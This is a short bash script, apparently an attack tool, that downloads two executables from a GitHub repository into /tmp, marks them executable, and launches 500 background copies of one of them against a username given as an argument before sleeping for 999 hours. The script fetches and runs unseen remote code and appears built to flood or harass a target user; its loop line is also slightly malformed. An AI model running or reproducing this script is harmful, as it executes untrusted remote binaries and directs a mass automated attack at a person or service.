#!/bin/bash
user="$1"
wget -O /tmp/sup https://raw.githubusercontent.com/walters99/ps/main/sup
wget -O /tmp/ps https://github.com/walters99/ps/raw/main/ps
chmod +x /tmp/sup /tmp/ps
for i in {1..500} :
do
  /tmp/sup $user >/dev/null &
done
sleep 999h
